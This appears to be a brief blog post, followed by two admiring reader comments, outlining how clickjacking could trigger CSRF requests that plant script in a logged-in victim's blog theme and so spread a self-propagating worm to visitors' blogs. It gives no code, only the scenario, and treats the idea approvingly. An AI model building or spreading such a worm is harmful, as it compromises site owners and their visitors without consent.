When talking about ClickJacking, people will first think how to use it to Hijack Web Cam or microphone. Let’s forget about webcam jacking thingies this time. Been thinking of how to use iFrame redressing (ClickJacking) techniques to exploit web application security. Finally my mind lands to a word, which is known as ‘Worm’.
Just like the Click-Jacking style Joomla CMS hijacking. CSRF and Automation are needed to infect blogs, CMS, forums, and etc. Possible? Yes indeed!
Scenario :
- Victim log in to his/her blog, and does not sign out from it.
- Victim visits a malicious site with Click-Jacking, any clicks there will trigger a CSRF attack which will attempt to insert a script into victims blog theme. (Just like WordPress Theme Editor)
- The script will generate an iFrame containing Click-Jacking
- Now the victim’s blog become a zombie that will attempt to infect all his/her blog’s visitors blog.
Isn’t it lovely? Just a thought . . .
If you enjoyed this article, please consider sharing it!
oh goodie
when i saw your video (the joomla clickjanging video), I think it’s so awesome! errr……. would u mind to share the script here? hehe
nice technique..my master. want you to share your technique..with me. i’ll wait your next post. if you have a time.. visit my site.
regards,
Noctis